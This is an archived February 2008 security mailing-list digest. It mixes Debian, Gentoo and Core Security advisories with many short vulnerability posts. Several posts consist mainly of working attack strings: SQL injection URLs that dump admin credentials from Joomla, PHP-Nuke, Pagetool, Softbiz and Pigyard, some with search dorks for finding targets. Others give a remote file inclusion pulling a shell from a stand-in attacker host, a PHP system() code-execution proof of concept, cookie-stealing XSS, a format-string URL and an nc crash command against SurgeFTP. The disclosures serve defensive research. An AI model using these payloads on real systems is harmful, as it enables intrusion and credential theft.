NULL pointer in SurgeFTP 2.3a2

2008-02-25 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  SurgeFTP
  http://www.netwinsite.com/surgeftp/
Versions: <= 2.3a2
Platforms:Windows, Linux and Solaris
Bug:  NULL pointer access
Exploitation: remote
Date: 25 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


SurgeFTP is a commercial FTP server which supports also SSL/TLS and has
a web interface for remote administration.


###

==
2) Bug
==


When a Content-Length parameter is received from the client, SurgeFTP
tries to allocate the amount of memory (max 2147483647 bytes) specified
in this field and then copies the data in the resulted new buffer.
The problem is in the lack of checks on the result of the allocation
which leads to the crash of the entire server during the copying of the
data to a NULL pointer if that amount of memory cannot be allocated.


###

===
3) The Code
===


http://aluigi.org/poc/surgeftpizza.txt

  nc SERVER 7021 -v -v < surgeftpizza.txt


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


Re: Powered by Pagetool Ver (1.04-05-06-07)

2008-02-25 Thread packet
Discovered in June '07:

http://packetstormsecurity.org/0706-exploits/pagetool-sql.txt


On Sun, Feb 24, 2008 at 10:00:41AM -, [EMAIL PROTECTED] wrote:
> Google arama :
> www.1923turk.org
> 
> Turkishwariorr
> 
> Powered by Pagetool Ver 1.04
> Powered by Pagetool Ver 1.07
> Powered by Pagetool Ver 1.05
> Powered by Pagetool Ver 1.06
> 
> 
> 
> Site sonuna :
> 
> index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*


Format string and buffer-overflow in SurgeMail 38k4

2008-02-25 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  SurgeMail Mail Server
http://netwinsite.com/surgemail/
  Netwin's WebMail
http://netwinsite.com/webmail/
Versions: SurgeMail <= 38k4 and beta 39a
  Netwin's WebMail <= 3.1s (only bug A)
Platforms:Windows, Linux, FreeBSD, MacOSX and Solaris
Bugs: A] format string in webmail.exe's page command
  B] buffer-overflow in the building of environment strings
Exploitation: remote
Date: 25 Feb 2008
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


SurgeMail is a well known commercial multiplatform mail server which
supports many protocols.


###

===
2) Bugs
===

--
A] format string in webmail.exe's page command
--

The CGI used for the handling of the webmail interface (webmail.exe) is
affected by a format string vulnerability in the function which builds
the error message when a wrong page is requested and passes it directly
to lvprintf without the needed format argument:

  "TPL: Failed to Locate Template 
{c:\surgemail\webmail\panel\%s%s%s%s%s%s.tpl}{2=No such file or directory}"

Sample URL for exploiting the vulnerability:

  http://SERVER/scripts/webmail.exe?page=%n%n%n%s%s%s%s


-
B] buffer-overflow in the building of environment strings
-

A buffer overflow vulnerability is located in the function which
handles the real CGI executables (which must be not confused with the
.cgi virtual files like user.cgi, admin.cgi and so on).
When the server receives a HTTP request for a real CGI (like for
example webmail.exe) it uses a buffer of about 2 bytes for storing
all the environment strings which will be passed to the called program.
The HTTP fields passed by the client in his request are truncated at
200 bytes for the parameter and 800 for its value and are added as
environment variables (HTTP_parameter=value).
The lack of checks on the size of this environment buffer leads to a
buffer-overflow, anyway although is possible to control some registers
code execution is not certain.

Naturally both the surgemail and the swatch (port 7027) processes are
affected by this vulnerability.


###

===
3) The Code
===


http://aluigi.org/poc/surgemailz.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org


[SECURITY] [DSA 1508-1] New diatheke packages fix arbirary shell command execution

2008-02-25 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1508-1  [EMAIL PROTECTED]
http://www.debian.org/security/  Thijs Kinkhorst
February 25, 2008 http://www.debian.org/security/faq
- 

Package: diatheke
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id : CVE-2008-0932
Debian Bug : 466449

Dan Dennison discovered that Diatheke, a CGI program to make a bible
website, performs insufficient sanitising of a parameter, allowing a
remote attacker to execute arbitrary shell commands as the web server
user.

For the stable distribution (etch), this problem has been fixed in version
1.5.9-2etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 1.5.7-7sarge1.

For the unstable distribution (sid), this problem has been fixed in version
1.5.9-8.

We recommend that you upgrade your diatheke package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:

  http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7-7sarge1.dsc
Size/MD5 checksum:  938 4f7872250c457ac36f0b20b4be235647
  
http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7-7sarge1.diff.gz
Size/MD5 checksum:   277640 f8993cddacdac25ca55b7e99ced8ff49
  http://security.debian.org/pool/updates/main/s/sword/sword_1.5.7.orig.tar.gz
Size/MD5 checksum:  1482711 369f09068839c646aeab691c63a40d67

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_alpha.deb
Size/MD5 checksum:   861694 ca88e3e550ae01cd8e3ad1a6d6471814
  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_alpha.deb
Size/MD5 checksum:   419320 35838e66e76e99777524aa81741025c8
  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_alpha.deb
Size/MD5 checksum:61684 b97611c37f53b39941573e6c76609c40

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_amd64.deb
Size/MD5 checksum:   602656 c4b37895a49dce481ea3c6a8817123c2
  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_amd64.deb
Size/MD5 checksum:56944 ad12da845e900e3a28c70b9b2baa6d70
  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_amd64.deb
Size/MD5 checksum:   383486 614d4988fd26ccc58dbe1029aacb7930

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_arm.deb
Size/MD5 checksum:60386 3400611bc0cba8ea77e4bfbeaa659ac6
  
http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_arm.deb
Size/MD5 checksum:   664170 d0d17f06931f3e6076aed502e8128d5c
  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_arm.deb
Size/MD5 checksum:   423264 9951b8913a4c6b18b357aead48e53f6c

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_hppa.deb
Size/MD5 checksum:62772 676ff7f61ab0ee7629e7fcb59d67cfd5
  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_hppa.deb
Size/MD5 checksum:   494764 15e5da49e21a167088aacebf94a12367
  
http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_hppa.deb
Size/MD5 checksum:   750722 44a066596efa0bb63b184635d3d9c985

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/s/sword/libsword-dev_1.5.7-7sarge1_i386.deb
Size/MD5 checksum:   556994 f04d2f9bc41e5703967630adf4e12754
  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_i386.deb
Size/MD5 checksum:   388072 4dabb05ea1d6b72ba61e8877cbad1544
  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_i386.deb
Size/MD5 checksum:58108 665ce388ee9a74a0d850007beae3051a

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/s/sword/libsword4_1.5.7-7sarge1_ia64.deb
Size/MD5 checksum:   466340 0a9f1874a5ee1d6617da38d4f7417802
  
http://security.debian.org/pool/updates/main/s/sword/diatheke_1.5.7-7sarge1_ia64.deb
Size/MD5 checksum:64644 e50afdc379e2ee1cfc63362ca56b6a43
  
http://security.debian.org/pool/updates/main/s/sword/

Powered by Pagetool Ver (1.04-05-06-07)

2008-02-25 Thread turkish-warrorr
Google arama :

www.1923turk.org


Turkishwariorr


Powered by Pagetool Ver 1.04

Powered by Pagetool Ver 1.07

Powered by Pagetool Ver 1.05

Powered by Pagetool Ver 1.06




Site sonuna :


index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*


Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

2008-02-25 Thread nbbn

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN

1) Remote File Inclusion

File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?




2) Cross-Site Scripting

Register Globals: ON
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E

Register Globals: Off

Vuln Line:(3) 
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E


3) Remote Code Execution

Register Globals: ON
Code: 
'.$text;

eval ('?>'.$text);
?>

Poc: 
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);



Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

2008-02-25 Thread No-Reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz: Aura, imm02tal, Kinglet, iM4n


Joomla Com_publication "pid" Remote SQL Injection


index.php?option=com_publication&task=view&pid=-999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/*


note: the prefix (jos_) maybe different for each website...


Regards,

The-0utl4w

Credits Goes to Aria-Security Team


CORE-2007-0930 Path Traversal vulnerability in VMware's shared folders implementation

2008-02-25 Thread Core Security Technologies Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


~  Core Security Technologies - CoreLabs Advisory
~   http://www.coresecurity.com/corelabs

Path Traversal vulnerability in VMware's shared folders implementation

*Advisory Information*

Title: Path Traversal vulnerability in VMware's shared folders implementation
Advisory ID: CORE-2007-0930
Advisory URL: http://www.coresecurity.com/?action=item&id=2129
Date published: 2008-02-25
Date of last update: 2008-02-25
Vendors contacted: VMware Inc.
Release mode: User release

*Vulnerability Information*

Class: Input Validation Error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Client-side Exploitable: No
Bugtraq ID: 27944
CVE Name: CVE-2008-0923

*Vulnerability Description*

Software from VMWare Inc. allows users to run an entire computer system
composed of hardware, OS and applications within a virtualized environment
isolated from the real hardware resources and the computer system that
controls them. Virtualization technologies such as VMware's increase
efficiency in the use of hardware and help to reduce operational costs
through consolidation of servers and desktop system running on fewer and
more maintainable hardware systems.

Among the many reasons that promote the adoption virtualization
technologies, one of the most commons today is the promise of an improved
information security posture due to the implied isolation between multiple
virtualized systems (referred as Guest systems) and the non-virtualized
systems controlling the virtualization hardware and software (the Host
system) [1].

Consequently, software bugs that could allow potential attackers to
invalidate the premise of effective isolation between Host and Guest
systems are considered security vulnerabilities with a potentially high
impact. Attacks to exploit these type of vulnerabilities has been
discussed on several public forums [2][3]. To maintain and improve user
inter-operation with virtualized and non-virtualized systems VMware's
software implements a number of inter-system communication features. The
Shared Folder mechanism is one of such features and is enabled by default
in all VMware's products that provide it.

VMware's shared folders allow users to transfer data between a virtualized
system (Guest) and the non-virtualized Host system that contains it. This
form of data transfer is available to users of the Guest system through
read and write access to file system folders shared by both Guest and Host
system. To maintain effective isolation between Guest and Host systems,
these mechanisms should limit access from the Guest only to the Host
system's folders that are selected for sharing with the virtualized guests.

A vulnerability was found in VMware's shared folders mechanism that grants
users of a Guest system read and write access to any portion of the Host's
file system including the system folder and other security-sensitive
files. Exploitation of these vulnerability allows attackers to break out
of an isolated Guest system to compromise the underlying Host system that
controls it.

Successful exploitation requires that the Shared Folder's feature to be
enabled which is the default on VMware products that have the feature AND
at least one folder of the Host system is configured for sharing.

*Vulnerable Packages*

. VMWare Workstation 6.0.2
. VMWare Workstation 5.5.4
. VMWare Player 2.0.2
. VMWare Player 1.0.4
. VMWare ACE 2.0.2
. VMWare ACE 1.0.2

*Non-vulnerable Packages*

. VMWare ESX
. VMWare Server

*Vendor Information, Solutions and Workarounds*

Disable the Shared Folders feature for all virtual machines. On VMWare
Workstation this can be done by clicking on "Edit virtual machine
settings" and disabling shared folders in the Options tab.

The vendor has published a security alert with a setp-by-step description
of how to disable Shared Folders on affected products.

*Critical VMware Security Alert for Windows-Hosted VMware Workstation,
VMware Player, and VMware ACE*
http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1004034

*Credits*

This vulnerability was discovered by Gerardo Richarte while developing an
exploit for vulnerability CVE-2007-1744. The final exploit for both
vulnerabilities was developed by Nicolas Economou, both of them from CORE
IMPACT's Exploit Writing Team (EWT), Core Security Technologies.

*Technical Description / Proof of Concept Code*

While developing an exploit for the CVE-2007-1744 vulnerability [4] the
root cause of the original bug was identified in the way that the
'PathName' parameter is processed by the VMware API that provides the
Shared Folders functionality in the Guest operating system.

The 'PathName' parameter is converted from a multi byte string to a wide
character string after verifying that it doesn't contain the dot-dot
substring (the two-byte sequence '0x2e0x2e' that translates to the ASCII
substring '".."') that may allow a malicious user to break out of the
shared 

[ GLSA 200802-10 ] Python: PCRE Integer overflow

2008-02-25 Thread Robert Buchholz
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200802-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Python: PCRE Integer overflow
  Date: February 23, 2008
  Bugs: #198373
ID: 200802-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability within Python's copy of PCRE might lead to the
execution of arbitrary code.

Background
==

Python is an interpreted, interactive, object-oriented programming
language.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  dev-lang/python < 2.3.6-r4>= 2.3.6-r4

Description
===

Python 2.3 includes a copy of PCRE which is vulnerable to an integer
overflow vulnerability, leading to a buffer overflow.

Impact
==

An attacker could exploit the vulnerability by tricking a vulnerable
Python application to compile a regular expressions, which could
possibly lead to the execution of arbitrary code, a Denial of Service
or the disclosure of sensitive information.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Python 2.3 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r4"

References
==

  [ 1 ] CVE-2006-7228
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7228
  [ 2 ] GLSA 200711-30
http://www.gentoo.org/security/en/glsa/glsa-200711-30.xml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200802-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


signature.asc
Description: This is a digitally signed message part.


Packeteer Products File Listing XSS

2008-02-25 Thread nnposter
Packeteer Products File Listing XSS



Product:


Packeteer PacketShaper

http://www.packeteer.com/products/packetshaper/


Packeteer PolicyCenter

http://www.packeteer.com/products/packetshaper/policycenter.cfm



The web management interface of several Packeteer products contains a 
cross-site scripting vulnerability in the file listing function. Parameter 
FILELIST, specified in an arbitrary page request, is not sufficiently sanitized 
before it gets embedded in the HTML output of the Error Report page. (The 
parameter value is limited to 64 characters.)


Example:

https://(target)/whatever.htm?FILELIST=%3C/script%3E%3Cbody+onLoad=alert(%26quot%3BXSS%26quot%3B)%3E%3Cscript%3E



The vulnerability has been identified in version 8.2.2. However, other versions 
may be also affected.



Solution:

Do not stay logged into the Packeteer web management interface while browsing 
other web sites.



Found by:

nnposter



Php Nuke "Sell" module SQL Injection ("cid")

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net



Shoutz: Aura, imm02tal, Kinglet, iM4n

Php Nuke "Sell" module SQL Injection  ("cid")



modules.php?name=Sell&d_op=viewsell&cid=-999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


Original Adivosry: 

http://forum.aria-security.net/showthread.php?p=1475


Regards,

The-0utl4w

Credits Goes to Aria-Security Team



[SECURITY] [DSA 1506-1] New iceape packages fix several vulnerabilities

2008-02-25 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1506-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
February 24, 2008 http://www.debian.org/security/faq
- 

Package: iceape
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415
 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591
 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594

Several remote vulnerabilities have been discovered in the Iceape internet
suite, an unbranded version of the Seamonkey Internet Suite. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0412

Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul
Nickerson discovered crashes in the layout engine, which might allow
the execution of arbitrary code.

CVE-2008-0413

Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown",
Philip Taylor and "tgirmann" discovered crashes in the Javascript
engine, which might allow the execution of arbitrary code.

CVE-2008-0414

"hong" and Gregory Fleisher discovered that file input focus
vulnerabilities in the file upload control could allow information
disclosure of local files.

CVE-2008-0415

"moz_bug_r_a4" and Boris Zbarsky discovered discovered several
vulnerabilities in Javascript handling, which could allow
privilege escalation.

CVE-2008-0417

Justin Dolske discovered that the password storage machanism could
be abused by malicious web sites to corrupt existing saved passwords.

CVE-2008-0418

Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory
traversal vulnerability in chrome: URI handling could lead to
information disclosure.

CVE-2008-0419

David Bloom discovered a race condition in the image handling of
designMode elements, which can lead to information disclosure or
potentially the execution of arbitrary code.

CVE-2008-0591

Michal Zalewski discovered that timers protecting security-sensitive
dialogs (which disable dialog elements until a timeout is reached)
could be bypassed by window focus changes through Javascript.

CVE-2008-0592

It was discovered that malformed content declarations of saved
attachments could prevent a user in the opening local files
with a ".txt" file name, resulting in minor denial of service.

CVE-2008-0593

Martin Straka discovered that insecure stylesheet handling during
redirects could lead to information disclosure.

CVE-2008-0594

Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing
protections could be bypassed with  elements.

For the stable distribution (etch), these problems have been fixed in
version 1.0.12~pre080131b-0etch1.

The Mozilla releases from the old stable distribution (sarge) are no
longer supported with security updates.

We recommend that you upgrade your iceape packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b.orig.tar.gz
Size/MD5 checksum: 43535826 39071cd311888d73254336b782109776
  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch1.dsc
Size/MD5 checksum: 1439 eaee68845cb7d4660609f6c47ac01666
  
http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch1.diff.gz
Size/MD5 checksum:   269895 fb6e3c3d3bc4a94773c1b4921fdb42d6

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/i/iceape/mozilla_1.8+1.0.12~pre080131b-0etch1_all.deb
Size/MD5 checksum:27208 91bbb99fad75c41e2df1170749014288
  
http://security.debian.org/pool/updates/main/i/iceape/mozilla-calendar_1.8+1.0.12~pre080131b-0etch1_all.deb
Size/MD5 checksum:27210 0233d457074aa58542b8662c2a54c48a
  
http://security.debian.org/pool/updates/main/i/iceape/mozilla-js-debugger_1.8+1.0.12~pre080131b-0etch1_all.deb
Size/MD5 checksum:27244 51f7e38462c1f39e0c662e4b58eca43a
  
http://security.debian.org/pool/updates/main/i/iceape/iceape-chatzilla_1.0.12~pre080131b-0etch

S21SEC-040-en: Infinite invalid authentication attempts possible in BEA WebLogic Server

2008-02-25 Thread S21sec labs
##

- S21Sec Advisory -

##

   Title:   Infinite invalid authentication attempts possible in BEA
WebLogic Server
  ID:   S21SEC-040-en
Severity:   Medium
   Scope:   BEA Weblogic
Platforms:   All
  Author:   [EMAIL PROTECTED]
 URL:   http://www.s21sec.com/avisos/s21sec-040-en.txt
 Release:   Public



[ SUMMARY ]

It's possible to launch a credentials brute force attack against known
users through an internal servlet that permits the bypass of the user
locking mechanism.


[ AFFECTED VERSIONS ]

The vulnerability was confirmed on:
7.0sp6
8.1sp4
9.0sp2

Versions 6 and previous are not vulnerable.


[ DESCRIPTION ]

BEA WebLogic Server is the world leading application server software.

To avoid credential brute force attacks, Weblogic server have a locking
mechanism that lock the corresponding account after some invalid login
attempts.

The default lock shots if 5 invalid login attempts were made. The lock
remains 30 minutes.

S21SEC has found that exists an internal servlet that allow the guess of
valid credentials even if the attacked account is locked.

This allows infinite invalid authentication attempts against an account.
When the correct credentials are guessed, it's only needed to wait for the
account to unlock and then logon into the server.

The affected servlet is:

/wl_management_internal1/LogfileSearch (Version 7 & 8)
/bea_wls_diagnostics/accessor (Version 9)


[ WORKAROUND ]

BEA has released an advisory about this vulnerability. Updates and more
information are available at Bea website:

http://dev2dev.bea.com/pub/advisory/271

[ ACKNOWLEDGMENTS ]

This vulnerability has been found and researched by:

Ramon Pinuaga Cascales 


[ REFERENCES ]

http://dev2dev.bea.com/pub/advisory/271



Alkacon OpenCms tree_files.jsp resource XSS

2008-02-25 Thread nnposter
Alkacon OpenCms tree_files.jsp resource XSS



Product: Alkacon OpenCms 

http://www.opencms.org/



OpenCms contains a cross-site scripting vulnerability in the file tree 
navigation function. An invalid value supplied to parameter resource in page 
opencms/system/workplace/views/explorer/tree_files.jsp is not sanitized before 
it gets embedded in the HTML output as part of a JavaScript comment.


Example:

http://(target)/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/



The vulnerability has been identified in version 7.0.3. However, other versions 
may be also affected.



Solution:

Users should not browse untrusted sites while logged into OpenCms.



Found by:

nnposter



[SECURITY] [DSA 1507-1] New turba2 packages fix permission testing

2008-02-25 Thread Steve Kemp
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1507-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
February 24, 2008 http://www.debian.org/security/faq
- 

Package: turba2
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2008-0807
Debian Bug : 464058

Peter Paul Elfferich discovered that turba2, a contact management component
for horde framework did not correctly check access rights before allowing
users to edit addresses.  This could result in valid users being able to
alter private address records.

For the stable distribution (etch), this problem has been fixed in version
2.1.3-1etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 2.0.2-1sarge1.

For the unstable distribution (sid), this problem has been fixed in version
2.1.7-1.

We recommend that you upgrade your turba2 package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:

  http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1.dsc
Size/MD5 checksum:  626 78ef803c5a5c3c0564ddd8b23a96da4d
  
http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1.diff.gz
Size/MD5 checksum: 8049 8ccfd8d4f1886141a916d706217d8a73
  http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2.orig.tar.gz
Size/MD5 checksum:  1221378 43381a9620d08ad17758fc533e865db3

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/turba2/turba2_2.0.2-1sarge1_all.deb
Size/MD5 checksum:  1282950 ee4a5791cb7b942305f9095b9b3ae697


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1.diff.gz
Size/MD5 checksum: 7434 fcef7709711274ebf26b99e3032f4e7e
  http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3.orig.tar.gz
Size/MD5 checksum:  1790717 a0407717f3f64fb33f6a57e2244a12b4
  http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1.dsc
Size/MD5 checksum:  722 0aa309ef908c6ab95b62fa6fbb97d7c5

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/t/turba2/turba2_2.1.3-1etch1_all.deb
Size/MD5 checksum:  1860044 0fb704f257a5d583196e10de104289f0


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHwWuDwM/Gs81MDZ0RAinaAJ9711WgcsQv3xAQ8dOautoN5BKMzgCfV4Ck
Azcmd1e9g/lOp0fVreD+G+Y=
=CWD7
-END PGP SIGNATURE-



Pigyard Art Gallery Multiple SQL Injection

2008-02-25 Thread No-Reply
Aria-Security Team, 

http://Aria-Security.net

---

Shout Outs: AurA, imm02tal, iM4N, Kinglet,

Vendor: Pigyard Art Gallery Multiple SQL Injection

This is a completation of the original advisory reported by ZoRLu @ Milw0rm 
(http://www.milw0rm.com/exploits/5181)


Original Link: http://forum.aria-security.net/showthread.php?p=1474


module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*

module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-99/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/*



Regards,

The-0utl4w

Credits Goes To Aria-Security.Net



Softbiz jokes and funny pictures (index.php) sql injection

2008-02-25 Thread Hamza Almersoumi
Script:Softbiz jokes & funny pictures
Author:-=Mizo=-
Dork:inurl:/index.php?sbcat_id=


Exploit:/index.php?sbcat_id=-1 union select
0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from
sbjks_admin/*
Admin cpanel:/path/admin

Greetz: L!0n - Red_casper - SoSo H H - DC - Iraqi_strike - Crack_man -
B0rizQ - Mahmood_ali - Net^Virus - iraqi_strike and all my friends!!


Joomla com_inter "id" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : AurA, Sc0rp!on, mormoroth, Kinglet, iM4N, 

Joomla com_inter "id" Remote SQL Injection


index.php?option=com_inter&op=The-0utl4wz&id=-11/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user


(Original Advisory@ http://forum.aria-security.net/showthread.php?p=1464)


The-0utl4w

Aria-Security Team

(Credits to Aria-Security Team)



Joomla Com_blog "pid" Remote SQL Injection

2008-02-25 Thread no-reply
Aria-Security Team (Persian Security Network)

http://Aria-Security.Net

---

Shoutz : The-0utl4w, Sc0rp!on, T3rr0r1st, mormoroth, Kinglet

Joomla Com_blog "pid" Remote SQL Injection


index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL INJECTION


(More info and guide on how to use this bug @ 
http://forum.aria-security.net/showthread.php?p=1461)


AurA,

Aria-Security Team

(Credits to Aria-Security Team)



